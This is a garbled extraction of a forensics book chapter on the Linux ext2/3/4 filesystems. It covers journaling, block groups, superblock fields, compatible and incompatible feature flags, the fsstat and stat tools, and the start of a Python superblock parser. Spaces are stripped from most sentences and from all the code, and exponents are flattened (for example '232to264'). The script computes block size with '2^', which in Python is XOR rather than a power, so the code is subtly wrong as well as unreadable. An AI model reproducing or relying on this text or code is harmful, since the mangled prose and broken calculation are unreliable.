Anaturalquestiontoaskiswhatistheextendedfilesystemextendedfrom?TheansweristheUnixFileSystem(UFS).WhiletheextNfamilyisanextensionofUFS,itisalsoasimplification.SomeofthefeaturesinUFSwerenolongerrelevanttomodernmedia,sotheywere removed to simplify the code and improve performance. The extN family ismeanttoberobustwithgoodperformance.

There is a reason that ext2 is normally reserved for static filesystems.Both ext3 andext4arejournalingfilesystems,butext2isanon-journalingfilesystem.What’sajournal?In this context it isn’t a chronicling of someone’s life occurrences.Rather journaling isusedtobothimproveperformanceandreducethechancesofdatacorruption.

Here is how a journaling filesystem works. Writes to the media are not doneimmediately,rathertherequestedchangesarewrittentoajournal.Youcanthinkoftheseupdatesliketransactionsinadatabase.Whenacommandreturnsitmeansthateithertheentiretransactionwascompleted(allofthedatawaswrittenorupdated)inwhichcaseitreturnssuccessorthefilesystemwasreturnedtoitspreviousstateifthecommandcouldnotbecompletedsuccessfully.Intheeventthatthecomputerwasnotshutdowncleanly,

the journal can be used to return things to a consistent state. Having a journalingfilesystemsignificantlyspeedsupthefilesystemcheck(fsck)process.

Extendedfilesystemsstoreinformationinblockswhichareorganizedintoblockgroups.Theblocksarenormally1024,2048,or4096bytesinsize.Mostmediayouarelikelytoencounteruse512bytesectors.Asaresult,blocksare2,4,or8sectorslong.Forreadersfamiliar with the FAT and NTFS filesystems, a block in Unix or Linux is roughlyequivalenttoaclusterinDOSorWindows.Theblockisthesmallestallocationunitfordiskspace.

A generic picture of the block groups is shown in Figure 7.1.Keep inmind that noteveryelementshownwillbepresentineachblockgroup.Wewillseelaterinthischapterthat the ext4 filesystem is highly customizable. Some elements may be moved oreliminatedfromcertaingroupstoimproveperformance.

Wewilldescribeeachof theelements inFigure7.1 indetail later in thischapter.Fornow,Iwillprovidesomebasicdefinitionsof these items.Thebootblock is justwhat itsounds like, boot code for the operating system. This might be unused on a modernsystem, but it is still required to be there for backward compatibility. A superblockdescribes the filesystem and tells the operating system where to find various elements(inodes,etc.).Groupdescriptorsdescribethelayoutofeachblockgroup.Inodes(shortforindexnodes)containallthemetadataforafileexceptforitsname.Datablocksareusedtostorefilesanddirectories.Thebitmapsindicatewhichinodesanddatablocksareinuse.

FIGURE7.1

Genericblockgroupstructure.Notethatsomecomponentsmaybeomittedfromablockgroupdependingonthefilesystemversionandfeatures.

The extended filesystem allows for optional features. The features fall into threecategories: compatible, incompatible, and read-only compatible. If an operating systemdoes not support a compatible feature, the filesystem can still be safely mounted.Conversely, if an operating system lacks support for an incompatible feature, thefilesystemshouldnotbemounted.Whenanoperatingsystemdoesn’tprovideafeatureonthe read-only compatible list, it is still safe to mount the filesystem, but only if it isattachedas read-only.Something tokeep inmind ifyouever findyourselfexamininga

suspected attacker’s computer is that he or she might be using non-standard extendedfeatures.

TheSleuthKit(TSK)byBrianCarrierisasetoftoolsforfilesystemanalysis.Oneofthese tools,fsstat, allows you to collect filesystem (fs) statistics (stat). By way ofwarning, this tool appears to be somewhat out of date and may not display all of thefeatures of your latest version ext4 filesystem correctly. Don’t worry, we will developsomeup-to-datescriptslaterinthischapterthatwillproperlyhandlethelatestversionsofext4asofthiswriting(plusyouwillhavePythoncodethatyoucouldupdateyourselfifrequired).

In order to usefsstat youmust first know the offset to the filesystem inside yourimage file. Recall that we learned in Chapter 5 that thefdisk tool could be used todeterminethisoffset.Thesyntaxforthiscommandissimplyfdisk<imagefile>.Aswe can see in Figure 7.2, the filesystem in our PFE subject image begins at sector2048.

FIGURE7.2

Usingfdisktodeterminetheoffsettothestartofafilesystem.

Once the offset is determined, the command to display filesystem statistics is justfsstat-o<offset><imagefile>, i.e.,fsstat-o2048pfe1.img.Partial results from running this command against ourPFE subject image are shown inFigure 7.3 and Figure 7.4. The results in Figure 7.3 reveal that we have a properlyunmountedext4filesystemthatwaslastmountedat/with1,048,577inodesand4,194,0484kBblocks.Compatible,incompatible,andread-onlycompatiblefeaturesarealsoshownin this screenshot. From Figure 7.4we can see there are 128 block groupswith 8,192inodesand32,768blockspergroup.Wealsoseestatisticsforthefirsttwoblockgroups.

FIGURE7.3

Resultofrunningfsstat–part1.

FIGURE7.4

Resultsofrunningfsstat–part2.

SUPERBLOCKSNowthatwehaveahigh levelviewof theextendedfilesystem,wewilldrilldowninto

eachofitsmajorcomponents,startingwiththesuperblock.Thesuperblockis1024byteslong and begins 1024 bytes (2 sectors) into the partition right after the boot block. Bydefault thesuperblock is repeated in thefirstblockofeachblockgroup,but thiscanbechangedbyenablingvariousfilesystemfeatures.

Some readers may be familiar with the BIOS parameter blocks and extended BIOSparameterblocksinFATandNTFSbootsectors.OnWindowssystemstheparametersinthoseblockscontainalltheinformationtheoperatingsystemrequiresinordertoreadfilesfromthedisk.ThesuperblockperformsasimilarfunctionforLinuxsystems.Informationcontainedinthesuperblockincludes

BlocksizeTotalblocksNumberofblocksperblockgroupReservedblocksbeforethefirstblockgroupTotalnumberofinodesNumberofinodesperblockgroupThevolumenameLastwritetimeforthevolumeLastmounttimeforthevolumePathwherethefilesystemwaslastmountedFilesystemstatus(whetherornotcleanlyunmounted)

When examining a filesystem it can be convenient to use a hex editor that is madespecificallyforthispurpose.OnesucheditorisActive@DiskEditorbyLsoft.Itisfreelyavailable and there is a version for Linux (aswell as one forWindows). TheActive@DiskEditor(ADE)maybedownloadedfromhttp://disk-editor.org.ADEhasseveralnicefeatures, including templates for interpreting common filesystem structures such assuperblocksandinodes.Thesubjectsystem’ssuperblockisshowninADEinFigure7.5.WewillcoverthefieldsinFigure7.5indetaillaterinthischapterduringourdiscussionofvariousfilesystemfeatures.Forthemoment,IfeelIshouldpointoutthat theblocksize(offset0x18 in the superblock) is storedasx,where theblock size inbytes=2(10 + x) =1024*2x.Forexample, thestoredblocksizeof2equates toa4kB(4096byte)block.Table 7.1 summarizes all of the fields that may be present in a superblock as of thiswriting. Thematerial in Table 7.1 primarily comes from the header file /usr/src/<linuxversion>/fs/ext4/ext4.h.

FIGURE7.5

ExaminingasuperblockwithActive@DiskEditor.

Table7.1.Superblockfieldsummary.

Offset Size Name Description

0x0 4 inodecount Totalinodecount.

0x4 4 blockcountlo Totalblockcount.

0x8 4 rblockcountlo Thisnumberofblockscanonlybeallocatedbythesuper-user.

0xC 4 freeblockcountlo Freeblockcount.

0x10 4 freeinodecount Freeinodecount.

0x14 4 firstdatablock Firstdatablock.

0x18 4 logblocksize Blocksizeis2^(10+logblocksize).

0x1C 4 logclustersize Clustersizeis(2^logclustersize).

0x20 4 blockpergroup Blockspergroup.

0x24 4 clusterpergroup Clusterspergroup,ifbigallocisenabled.

0x28 4 inodepergroup Inodespergroup.

0x2C 4 mtime Mounttime,insecondssincetheepoch.

0x30 4 wtime Writetime,insecondssincetheepoch.

0x34 2 mntcount Numberofmountssincethelastfsck.

0x36 2 maxmntcount Numberofmountsbeyondwhichafsckisneeded.

0x38 2 magic Magicsignature,0xEF53

0x3A 2 state Filesystemstate.

0x3C 2 errors Behaviorwhendetectingerrors.

0x3E 2 minorrevlevel Minorrevisionlevel.

0x40 4 lastcheck Timeoflastcheck,insecondssincetheepoch.

0x44 4 checkinterval Maximumtimebetweenchecks,inseconds.

0x48 4 creatoros OS.Oneof:Probably0=Linux

0x4C 4 revlevel Revisionlevel.Oneof:0or1

0x50 2 defresuid Defaultuidforreservedblocks.

0x52 2 defresgid Defaultgidforreservedblocks.

0x54 4 firstino Firstnon-reservedinode.

0x58 2 inodesize Sizeofinodestructure,inbytes.

0x5A 2 blockgroupnr Blockgroup#ofthissuperblock.

0x5C 4 featurecompat Compatiblefeaturesetflags.

0x60 4 featureincompat Incompatiblefeatureset.

0x64 4 featurerocompat Readonly-compatiblefeatureset.

0x68 byte uuid[16] 128-bitUUIDforvolume.

0x78 char volumename[16] Volumelabel.

0x88 char lastmounted[64] Directorywherefilesystemwaslastmounted.

0xC8 4 algorithmusagebitmap Forcompression(Notusedine2fsprogs/Linux)

0xCC byte preallocblocks Blockstopreallocateforfiles

0xCD byte preallocdirblocks Blockstopreallocatefordirectories.

0xCE 2 reservedgdtblocks NumberofreservedGDTentries.

0xD0 byte journaluuid[16] UUIDofjournalsuperblock

0xE0 4 journalinum inodenumberofjournalfile.

0xE4 4 journaldev Devicenumberofjournalfile

0xE8 4 lastorphan Startoflistoforphanedinodestodelete.

0xEC 4 hashseed[4] HTREEhashseed.

0xFC byte defhashversion Defaulthashalgorithmtousefordirectories.

0xFD byte jnlbackuptype Journalbackuptype.

0xFE 2 descsize Sizeofgroupdescriptors

0x100 4 defaultmountopts Defaultmountoptions.

0x104 4 firstmetabg Firstmetablockblockgroup.

0x108 4 mkftime Whenthefilesystemwascreated.

0x10C 4 jnlblocks[17] Backupcopyofthejournalinode’siblock[].

0x150 4 blockcounthi High32-bitsoftheblockcount.

0x154 4 rblockcounthi High32-bitsofthereservedblockcount.

0x158 4 freeblockcounthi High32-bitsofthefreeblockcount.

0x15C 2 minextraisize Allinodeshaveatleast#bytes.

0x15E 2 wantextraisize Newinodesshouldreserve#bytes.

0x160 4 flags Miscellaneousflags.

0x164 2 raidstride RAIDstride.

0x166 2 mmpinterval Secondstowaitinmulti-mountprevention.

0x168 8 mmpblock Block#formulti-mountprotectiondata.

0x170 4 raidstripewidth RAIDstripewidth.

0x174 byte loggroupperflex Flexibleblockgroupsize=2^loggroupperflex.

0x175 byte checksumtype Metadatachecksumalgorithmtype.

0x176 2 reservedpad Alignmentpadding.

0x178 8 kbytewritten KBwrittentothisfilesystemever.

0x180 4 snapshotinum inodenumberofactivesnapshot.

0x184 4 snapshotid SequentialIDofactivesnapshot.

0x188 8 snapshotrblockcount Numberofblocksreservedforactivesnapshot.

0x190 4 snapshotlist inodenumberoftheheadofthesnapshot.

0x194 4 errorcount Numberoferrorsseen.

0x198 4 firsterrortime Firsttimeanerrorhappened.

0x19C 4 firsterrorino inodeinvolvedinfirsterror.

0x1A0 8 firsterrorblock Numberofblockinvolvedoffirsterror.

0x1A8 byte firsterrorfunc[32] Nameoffunctionwheretheerrorhappened.

0x1C8 4 firsterrorline Linenumberwhereerrorhappened.

0x1CC 4 lasterrortime Timeofmostrecenterror.

0x1D0 4 lasterrorino inodeinvolvedinmostrecenterror.

0x1D4 4 lasterrorline Linenumberwheremostrecenterrorhappened.

0x1D8 8 lasterrorblock Numberofblockinvolvedinmostrecenterror.

0x1E0 byte lasterrorfunc[32] Nameoffunctionformostrecenterror.

0x200 byte mountopts[64] ASCIIZstringofmountoptions.

0x240 4 usrquotainum Inodenumberofuserquotafile.

0x244 4 grpquotainum Inodenumberofgroupquotafile.

0x248 4 overheadblocks Overheadblocks/clustersinfs.

0x24C 4 backupbgs[2] Blockgroupscontainingsuperblockbackups.

0x24E 4 encryptalgos[4] Encryptionalgorithmsinuse.

0x252 4 reserved[105] Paddingtotheendoftheblock.

0x3FC 4 checksum Superblockchecksum.

WhenusingActive@DiskEditorIrecommendthatyouopeneachvolumebyselecting“OpeninDiskEditor”asshowninFigure7.6.Thiscreatesanewtabwithalogicalviewof your filesystem. This logical view is more convenient than the raw physical viewbecause,amongotherthings,itwillautomaticallyapplysomeofthebuilt-intemplates.IfyoueverusethistoolwithWindowsfilesystemsitwillalsotranslateclusterstosectorsforyou.

FIGURE7.6

OpeningalogicalviewofavolumeinActive@DiskEditor.

EXTENDEDFILESYSTEMFEATURESAspreviouslymentioned,theextendedfilesystemsupportsanumberofoptionalfeatures.These are grouped into compatible, incompatible, and read-only compatible features.Detailsofthesevarioustypesoffeaturesarepresentedbelow.

Youmay be wondering why a forensic examiner should care about features. This iscertainlyafairquestion.Thereareanumberofreasonswhythisisrelevanttoforensics.First, thesefeaturesmayaffectthestructureofblockgroups.Second,thisinturnaffectswheredataislocated.Third,featuresaffecthowdataisstored.Forexample,dependingonthe features used some data may be stored in inodes versus its usual location in datablocks. Fourth, some featuresmight result in a new source ofmetadata for use in youranalysis.

CompatibleFeaturesCompatible features are essentially nice-to-haves. In other words, if you support thisfeature,thatisgreat,butifnot,feelfreetomountafilesystemusingthemasreadableandwritable.Whileyoumaymountthisfilesystem,youshouldnotrunthefsck(filesystemcheck)utilityagainstitasyoumightbreakthingsassociatedwiththeseoptionalfeatures.ThecompatiblefeatureslistasofthiswritingissummarizedinTable7.2.

Table7.2.CompatibleFeatures.

Bit Name Description

0x1 DirPrealloc Directorypreallocation

0x2 Imagicinodes OnlytheShadowknows

0x4 HasJournal Hasajournal(Ext3andExt4)

0x8 ExtAttr SupportsExtendedAttributes

0x10 ResizeInode HasreservedGroupDescriptorTableentriesforexpansion

0x20 DirIndex Hasdirectoryindices

0x40 LazyBG Supportforuninitializedblockgroups(notcommon)

0x80 ExcludeInode Notcommon

0x100 ExcludeBitmap Notcommon

0x200 SparseSuper2 Ifsetsuperblockbackup_bgspointsto2BGwithSBbackup

ThefirstfeatureinTable7.2isDirectoryPreallocation.Whenthisfeatureisenabledtheoperatingsystemshouldpreallocatesomespacewheneveradirectory iscreated.This isdone toprevent fragmentationof thedirectorywhichenhancesperformance.While thiscanbeuseful,itiseasytoseewhyitisokaytomountthefilesystemeveniftheoperatingsystemdoesnotsupportthisoptimization.

Bit2(valueof0x04)issetifthefilesystemhasajournal.Thisshouldalwaysbesetforext3andext4 filesystems.This is a compatible featurebecause it is (somewhat) safe toreadandwriteafilesystemevenifyouarenotwritingthroughajournaltodoso.

Bit4(valueof0x08)issetifthefilesystemsupportsextendedattributes.ThefirstuseofextendedattributeswasAccessControlLists (ACL).Other typesofextendedattributes,includinguser-specified,arealsosupported.Wewilllearnmoreaboutextendedattributeslaterinthischapter.

WhentheResizeInodefeatureisinuse,eachblockgroupcontaininggroupdescriptorswill have extra space for future expansionof the filesystem.Normally a filesystemcangrowto1024timesitscurrentsize,sothisfeaturecanresultinquiteabitofemptyspaceinthegroupdescriptortable.Aswewillseelaterinthischapter,enablingcertainfeatureseliminatesthestoringofgroupdescriptorsineveryblockgroup.

Directories are normally stored in a flat format (simple list of entries) in extendedfilesystems.Thisisfinewhendirectoriesaresmall,butcanleadtosluggishperformancewithlargerdirectories.WhentheDirectoryIndexfeatureisenabledsomeoralldirectoriesmaybeindexedtospeedupsearches.

Normallywhenanextendedfilesystemiscreated,alloftheblockgroupsareinitialized(settozeros).WhentheLazyBlockGroupfeatureisenabled,afilesystemcanbecreatedwithoutproperlyinitializingthemetadataintheblockgroups.Thisfeatureisuncommon,asaretheExcludeInodeandExcludeBitmapfeatures.

In a generic extended filesystem the superblock is backed up in every single blockgroup.Thereareanumberoffeatures thatcanbeusedtochangethisbehavior.Modernmediaareconsiderablymore reliable than theirpredecessors.Asa result, itmakes littlesensetowastediskspacewithhundredsofsuperblockbackups.WhentheSparseSuper2featureisenabledtheonlysuperblockbackupsareintwoblockgroupslistedinanarrayinthesuperblock.

Now that we have learned about all the compatible features, we might ask whichfeatures affect the layout of our data. The two features in this category that affect thefilesystemlayoutareResizeInodeandSparseSuper2whichaddreservedspaceingroupdescriptor tables and cause backup superblocks to be removed from all but two blockgroups,respectively.

How can you get enabled features and other information from a liveLinux extendedfilesystem?Not surprisingly there are a number of tools available. The first tool is thestat (statistics) command which is normally used on files, but may also be used onfilesystems. The syntax for running this command on a normal file is stat<filename>, i.e.,stat*.mp3. The results of running stat on someMP3 files is

shown in Figure 7.7.To run stat on a filesystem the command isstat-f<mountpoint>,i.e.,stat-f/.Theoutputfromstat-f/runonmylaptopisshowninFigure7.8.Note that the filesystemID, type,block size, total/free/availableblocks, andtotal/freeinodesaredisplayed.

FIGURE7.7

Runningthestatcommandonregularfiles.

FIGURE7.8

Runningthestatcommandonafilesystem.

Like thestat command, thefile command canbe applied to files or filesystems.Whenrunagainstfilesthefilecommandwilldisplaythefile type.NotethatLinuxismuchsmarterthanWindowswhenitcomestodecidingwhattodowithfiles.LinuxwilllookinsidethefileforafilesignaturewhileWindowswillstupidlyusenothingbutafile’sextensiontodeterminehowitishandled.TheresultsofrunningfileontheMP3filesfromFigure7.7.areshowninFigure7.9.Whenrunagainstadiskdevicethe-s(specialfiles)and-L(dereferencelinks)optionsshouldbeused.Figure7.10showstheresultsofrunningfile-sL/dev/sd*onmylaptop.

FIGURE7.9

Outputoffilecommandwhenrunagainstregularfiles.

FIGURE7.10

Outputoffilecommandwhenrunagainstharddiskdevicefiles.

FromFigure7.10itcanbeseenthatmyLinuxvolumehasjournaling(notsurprisingasit is an ext4 filesystem), uses extents, and supports large andhuge files.These featureswillbedescribedinmoredetaillaterinthischapter.

IncompatiblefeaturesIncompatible features are those that could lead to data corruption or misinterpretationwhenafilesystemismountedbyasystemthatdoesn’tsupportthem,evenwhenmountedread-only.Notsurprisingly,thelistofincompatiblefeaturesislongerthanthecompatiblefeatures list. It should go without saying that if you should not mount a filesystem, itwouldbeaverybadideatorunfsckagainstit.IncompatiblefeaturesaresummarizedinTable7.3.

Table7.3

Bit Name Description

0x1 Compression Filesystemiscompressed

0x2 Filetype Directoryentriesincludethefiletype

0x4 Recover Filesystemneedsrecovery

0x8 JournalDev Journalisstoredonanexternaldevice

0x10 MetaBG Metablockgroupsareinuse

0x40 Extents Filesystemusesextents

0x80 64Bit Filesystemcanbe2^64blocks(asopposedto2^32)

0x100 MMP Multiplemountprotection

0x200 FlexBG Flexibleblockgroupsareinuse

0x400 EAInode Inodescanbeusedforlargeextendedattributes

0x1000 DirData Dataindirectoryentry

0x2000 BGMetaCsum BlockGroupmetachecksums

0x4000 LargeDir Directories>2GBor3-levelhtree

0x8000 InlineData Datainlineintheinode

0x10000 Encrypt Encryptedinodesareusedinthisfilesystem

The Compression feature indicates that certain filesystem components may becompressed.Obviously, if youroperating systemdoesnot support this feature,youwillnotbeabletogetmeaningfuldatafromthevolume.

Onextendedfilesystemsthefiletypeisnormallystoredintheinodewithalltheothermetadata.Inordertospeedupcertainoperations,thefiletypemayalsobestoredinthedirectoryentryiftheFiletypefeatureisenabled.Thisisdonebyre-purposinganunusedbyteinthedirectoryentry.Thiswillbediscussedindetaillaterinthischapter.

TheRecoverfeatureflagindicatesthatafilesystemneedstoberecovered.Thejournalwillbeconsultedduringthisrecoveryprocess.Whilethejournalisnormallystoredonthesamemediaas thefilesystem, itmaybestoredonanexternaldevice if theJournalDevfeature is enabled. The use of JournalDev is not terribly common, but there are somesituationswheretheperformanceimprovementjustifiestheextracomplexity.

TheMetaBlockGroupbreaksupa filesystem intomanymetablockgroups sized sothatgroupdescriptorscanbestoredinasingleblock.Thisallowsfilesystemslargerthan256terabytestobeused.

TheExtentsfeatureallowsmoreefficienthandlingoflargefiles.ExtentsaresimilartoNTFSdatarunsinthat theyallowlargefiles tobemoreefficientlystoredandaccessed.Extentswillbediscussedindetaillaterinthischapter.

The64-bitfeatureincreasesthemaximumnumberofblocksfrom232to264.Thisisnotaterriblycommonfeatureas32-bitmodesupportsfilesystemsaslargeas256petabytes(256*1024terabytes).Itismorelikelytobefoundwhenasmallblocksizeisdesirable,suchaswithaserverthatstoresalargenumberofsmallfiles.

TheMultipleMount Protection feature is used to detect if more than one operatingsystem or process is using a filesystem.When this feature is enabled, any attempts tomount an alreadymounted filesystem should fail. As a double-check, themount status(sequencenumber)isrecheckedperiodicallyandthefilesystemisremountedread-onlyiftheoperatingsystemdetectsthatanotherentityhasmountedit.

Likeextents,flexibleblockgroupsareusedtomoreefficientlyhandlelargefiles.WhentheFlexBlockGroupfeatureisenabled,someoftheitemsinadjacentblockgroupsaremovedaroundtoallowmoredatablocksinsomegroupssothatlargefileshaveabetterchanceofbeingstoredcontiguously.Thisfeatureisoftenusedinconjunctionwithextents.

Extended attributeswere discussed in the previous section. If extended attributes aresupported, theymaybestored in the inodesor indatablocks. If theExtendedAttributeInodeflagisset,thentheoperatingsystemmustsupportreadingextendedattributesfromtheinodeswherevertheyexist.

Wehave seen several features that allowmoreefficientprocessingof large files.TheDirectoryData feature is an optimization for small files.When this feature is enabled,smallfilescanbestoredcompletelywithintheirdirectoryentry.Largerfilesmaybesplitbetween thedirectoryentryanddatablocks.Because the first fewbytesoftencontainafile signature, storing the beginning of a file in the directory entry can speed upmanyoperations by eliminating the need to read data blocks to determine the file type. TheInline Data feature is similar, but data is stored in the inodes instead of the directoryentries.

The remaining incompatible features are Block Group Meta Checksum, LargeDirectory,andEncryptwhichindicatethatchecksumsformetadataarestoredintheblockgroups,directorieslargerthan2gigabytesorusing3-levelhashtreesarepresent,andthatinodesareencrypted,respectively.Noneofthesethreefeaturesarecommon.

Foralloftheseincompatiblefeatures,wearemostinterestedintheonesthataffectourfilesystem layout. There are three such features: Flexible Block Groups, Meta BlockGroups,and64-bitMode.Flexibleblockgroupscombinemultiplebloggroupstogetherinaflexgroup.Theflexgroupsizeisnormallyapoweroftwo.Thedataandinodebitmapsand the inode tableareonlypresent in the firstblockgroupwithin the flexgroup.Thisallowssomeblockgroupstoconsistentirelyofdatablockswhichallowslargefilestobe

storedwithoutfragmentation.

Whenmeta block groups are in use, the filesystem is partitioned into several logicalchunkscalledmetablockgroups.Thegroupdescriptorsareonlyfoundinthefirst,second,andlastblockgroupforeachmetablockgroup.

Theuseof64-bitmodedoesnotdirectlyaffectthefilesystemlayout.Rather,theeffectisindirectassomestructureswillgrowinsizewhen64-bitmodeisinuse.

Read-onlycompatiblefeaturesRead-onlycompatiblefeaturesarerequiredtobesupportedinordertoalterdata,butnotneededtocorrectlyreaddata.Obviously,ifyouroperatingsystemdoesnotsupportoneormore of these features, you should not run fsck against the filesystem. Read-onlycompatiblefeaturesaresummarizedinTable7.4.

Table7.4.Read-onlyCompatibleFeatures.

Bit Name Description

0x1 SparseSuper Sparsesuperblocks(onlyinBG0orpowerof3,5,or7)

0x2 LargeFile File(s)largerthan2GBexistonthefilesystem

0x4 BtreeDir Btreesareusedindirectories(notcommon)

0x8 HugeFile Filesizesarerepresentedinlogicalblocks,notsectors

0x10 GdtCsum Groupdescriptortableshavechecksums

0x20 DirNlink Subdirectoriesarenotlimitedto32kentries

0x40 ExtraIsize Indicateslargeinodesarepresentonthefilesystem

0x80 HasSnapshot Filesystemhasasnapshot

0x100 Quota Diskquotasarebeingusedonthefilesystem

0x200 BigAlloc Fileextentsaretrackedinmulti-blockclusters

0x400 MetadataCsum Checksumsareusedonmetadataitems

0x800 Replica Thefilesystemsupportsreplicas

0x1000 ReadOnly Shouldonlybemountedasread-only

When the Sparse Superblock feature is in use, the superblock is only found in blockgroup0orinblockgroupsthatareapowerof3,5,or7.Ifthereisatleastonefilegreaterthan2gigabytesonthefilesystem,theLargeFilefeatureflagwillbeset.TheHugeFile

featureflagindicatesatleastonehugefileispresent.Hugefileshavetheirsizesspecifiedinclusters(thesizeofwhichisstoredinthesuperblock)insteadofdatablocks.

TheBtreeDirectoryfeatureallowslargedirectoriestobestoredinbinary-trees.Thisisnot common. Another feature related to large directories is DirectoryNlink.When theDirectoryNlinkflagisset,subdirectoriesarenotlimitedto32,768entriesasinpreviousversionsofext3.

The GDT Checksum feature allows checksums to be stored in the group descriptortables.TheExtraIsizefeatureflagindicatesthatlargeinodesarepresentonthefilesystem.If a filesystemsnapshot ispresent, theHasSnapshot flagwillbe set.Diskquotause isindicatedbytheQuotafeatureflag.

TheBigAllocfeatureisusefulifmostofthefilesonthefilesystemarehuge.Whenthisis inuse, fileextents (discussed later in thischapter)andother filesystemstructuresusemulti-blockclustersforunits.TheMetadataChecksumflagindicatesthatchecksumsarestoredforthemetadataitemsininodes,etc.Ifafilesystemsupportsreplicas,theReplicaflagwillbeset.AfilesystemwiththeReadOnlyflagsetshouldonlybemountedasread-only.Thisflagcanbesettopreventothersfrommodifyingthefilesystem’scontents.

Only two features in the read-onlycompatible set affect the filesystem layout:SparseSuper Blocks and Extra Isize. Sparse super blocks affect which block groups havesuperblockbackups.Like64-bitmode,theExtraIsizefeatureaffectsthelayoutindirectlybychangingtheinodesize.

USINGPYTHONWehaveseenhowfsstatandother toolscanbeused togetmetadatafromanimagefile.WewillnowturnourattentiontousingPythontoextractthisinformation.SomeofyoumightquestiongoingtothetroubleofcreatingsomePythoncodewhentoolsalreadyexistforthispurpose.Thisiscertainlyafairquestion.

I do think developing somePythonmodules is a good idea for a number of reasons.First,IhavefoundthattoolssuchasTheSleuthKit(TSK)donotappeartobecompletelyup todate.Asyouwillseewhenrunning thePythonscripts fromthissection, thereareseveralfeaturesinuseonthePFEsubjectfilesystemthatarenotreportedbyTSK.

Second,itisusefultohavesomePythoncodethatyouunderstandinyourtoolbox.Thisallowsyoutomodifythecodeasnewfeaturesareadded.Italsoallowsyoutointegratefilesystemdataintootherscriptsyoumightuse.

Third,walkingthroughthesestructuresinordertodevelopthePythoncodehelpsyoutobetterunderstandandlearnhowtheextendedfilesystemswork.IfyouarenewtoPython,youmightalsolearnsomethingnewalongtheway.Webeginourjourneybycreatingcodetoreadthesuperblock.

ReadingthesuperblockThefollowingcodewillallowyoutoreadasuperblockfromadiskimage.Wewillwalk

throughmost,butnotallthiscode.Anoteonformatting:manyofthecommentsthatwereoriginallyat theendof lineshavebeenmovedto the lineabovetomakethecodemorelegibleinthisbook.#!/usr/bin/python

#

#extfs.py

#

#ThisisasimplePythonscriptthatwill

#getmetadatafromanext2/3/4filesysteminside

#ofanimagefile.

#

#DevelopedforPentesterAcademy

#byDr.PhilPolstra(@ppolstra)

importsys

importos.path

importsubprocess

importstruct

importtime

#thesearesimplefunctionstomakeconversionseasier

defgetU32(data,offset=0):

returnstruct.unpack(‘<L’,data[offset:offset+4])[0]

defgetU16(data,offset=0):

returnstruct.unpack(‘<H’,data[offset:offset+2])[0]

defgetU8(data,offset=0):

returnstruct.unpack(‘B’,data[offset:offset+1])[0]

defgetU64(data,offset=0):

returnstruct.unpack(‘<Q’,data[offset:offset+8])[0]

#thisfunctiondoesn’tunpackthestringbecause

#itisn’treallyanumberbutaUUID

defgetU128(data,offset=0):

returndata[offset:offset+16]

defprintUuid(data):

retStr=\

format(struct.unpack(‘<Q’,data[8:16])[0],‘X’).zfill(16)+\

format(struct.unpack(‘<Q’,data[0:8])[0],‘X’).zfill(16)

returnretStr

defgetCompatibleFeaturesList(u32):

retList=[]

ifu32&0x1:

retList.append(‘DirectoryPreallocate’)

ifu32&0x2:

retList.append(‘ImagicInodes’)

ifu32&0x4:

retList.append(‘HasJournal’)

ifu32&0x8:

retList.append(‘ExtendedAttributes’)

ifu32&0x10:

retList.append(‘ResizeInode’)

ifu32&0x20:

retList.append(‘DirectoryIndex’)

ifu32&0x40:

retList.append(‘LazyBlockGroups’)

ifu32&0x80:

retList.append(‘ExcludeInode’)

ifu32&0x100:

retList.append(‘ExcludeBitmap’)

ifu32&0x200:

retList.append(‘SparseSuper2’)

returnretList

defgetIncompatibleFeaturesList(u32):

retList=[]

ifu32&0x1:

retList.append(‘Compression’)

ifu32&0x2:

retList.append(‘Filetype’)

ifu32&0x4:

retList.append(‘Recover’)

ifu32&0x8:

retList.append(‘JournalDevice’)

ifu32&0x10:

retList.append(‘MetaBlockGroups’)

ifu32&0x40:

retList.append(‘Extents’)

ifu32&0x80:

retList.append(‘64-bit’)

ifu32&0x100:

retList.append(‘MultipleMountProtection’)

ifu32&0x200:

retList.append(‘FlexibleBlockGroups’)

ifu32&0x400:

retList.append(‘ExtendedAttributesinInodes’)

ifu32&0x1000:

retList.append(‘DirectoryData’)

ifu32&0x2000:

retList.append(‘BlockGroupMetadataChecksum’)

ifu32&0x4000:

retList.append(‘LargeDirectory’)

ifu32&0x8000:

retList.append(‘InlineData’)

ifu32&0x10000:

retList.append(‘EncryptedInodes’)

returnretList

defgetReadonlyCompatibleFeaturesList(u32):

retList=[]

ifu32&0x1:

retList.append(‘SparseSuper’)

ifu32&0x2:

retList.append(‘LargeFile’)

ifu32&0x4:

retList.append(‘BtreeDirectory’)

ifu32&0x8:

retList.append(‘HugeFile’)

ifu32&0x10:

retList.append(‘GroupDescriptorTableChecksum’)

ifu32&0x20:

retList.append(‘DirectoryNlink’)

ifu32&0x40:

retList.append(‘ExtraIsize’)

ifu32&0x80:

retList.append(‘HasSnapshot’)

ifu32&0x100:

retList.append(‘Quota’)

ifu32&0x200:

retList.append(‘BigAlloc’)

ifu32&0x400:

retList.append(‘MetadataChecksum’)

ifu32&0x800:

retList.append(‘Replica’)

ifu32&0x1000:

retList.append(‘Read-only’)

returnretList

#Thisclasswillparsethedatainasuperblock

classSuperblock():

def__init__(self,data):

self.totalInodes=getU32(data)

self.totalBlocks=getU32(data,4)

self.restrictedBlocks=getU32(data,8)

self.freeBlocks=getU32(data,0xc)

self.freeInodes=getU32(data,0x10)

#normally0unlessblocksizeis<4k

self.firstDataBlock=getU32(data,0x14)

#blocksizeis1024*2^(whateverisinthisfield)

self.blockSize=2^(10+getU32(data,0x18))

#onlyusedifbigallocfeatureenabled

self.clusterSize=2^(getU32(data,0x1c))

self.blocksPerGroup=getU32(data,0x20)

#onlyusedifbigallocfeatureenabled

self.clustersPerGroup=getU32(data,0x24)

self.inodesPerGroup=getU32(data,0x28)

self.mountTime=time.gmtime(getU32(data,0x2c))

self.writeTime=time.gmtime(getU32(data,0x30))

#mountssincelastfsck

self.mountCount=getU16(data,0x34)

#mountsbetweenfsck

self.maxMountCount=getU16(data,0x36)

self.magic=getU16(data,0x38)#shouldbe0xef53

#0001/0002/0004=cleanlyunmounted/errors/orphans

self.state=getU16(data,0x3a)

#whenerrors1/2/3continue/read-only/panic

self.errors=getU16(data,0x3c)

self.minorRevision=getU16(data,0x3e)

#lastfscktime

self.lastCheck=time.gmtime(getU32(data,0x40))

#secondsbetweenchecks

self.checkInterval=getU32(data,0x44)

#0/1/2/3/4Linux/Hurd/Masix/FreeBSD/Lites

self.creatorOs=getU32(data,0x48)

#0/1original/v2withdynamicinodesizes

self.revisionLevel=getU32(data,0x4c)

#UIDforreservedblocks

